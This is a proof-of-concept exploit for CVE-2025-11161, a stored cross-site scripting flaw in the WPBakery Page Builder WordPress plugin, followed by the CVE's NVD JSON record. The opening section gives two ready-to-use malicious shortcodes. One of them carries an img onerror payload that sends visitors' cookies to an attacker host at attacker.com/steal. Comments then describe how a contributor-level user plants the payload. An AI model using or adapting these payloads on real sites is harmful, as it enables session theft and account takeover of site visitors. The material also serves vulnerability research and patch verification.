CVE-2025-11161

<!-- CVE-2025-11161: WPBakery Page Builder Stored XSS via vc_custom_heading --> <!-- Exploits insufficient sanitization in font_container parameter --> [vc_custom_heading font_container="tag:h1|text:<script>alert('XSS-CVE-2025-11161')</script>" use_theme_fonts="yes" el_class="malicious-class" ][/vc_custom_heading] <!-- Alternative payload using event handler in tag attribute --> <!-- Note: tag attribute should be restricted to safe HTML tags, but is not --> [vc_custom_heading font_container="tag:<img src=x onerror=document.location='http://attacker.com/steal?c='+document.cookie>|text:Click Here" use_theme_fonts="yes" ][/vc_custom_heading] <!-- Attack flow: --> <!-- 1. Attacker with Contributor+ access creates a post/page --> <!-- 2. Inserts the above shortcode with malicious payload in font_container --> <!-- 3. Publishes the content (stored in database) --> <!-- 4. When any user views the page, the injected script executes in their browser -->

{"cve": {"id": "CVE-2025-11161", "sourceIdentifier": "[email protected]", "published": "2025-10-15T07:15:32.023", "lastModified": "2025-11-26T15:10:01.260", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WPBakery Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the vc_custom_heading shortcode in all versions up to, and including, 8.6.1. This is due to insufficient restriction of allowed HTML tags and improper sanitization of user-supplied attributes in the font_container parameter. This makes it possible for authenticated attackers with contributor-level access or higher to inject arbitrary web scripts in posts that will execute whenever a user accesses an injected page via the vc_custom_heading shortcode with malicious tag and text attributes granted they have access to use WPBakery shortcodes."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-80"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wpbakery:page_builder:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "8.7", "matchCriteriaId": "EDDF2342-1A29-40FB-845E-15F586CA1504"}]}]}], "references": [{"url": "http://kb.wpbakery.com/docs/preface/release-notes/", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2772cade-c625-437a-b57b-ce8a2e3393bf?source=cve", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}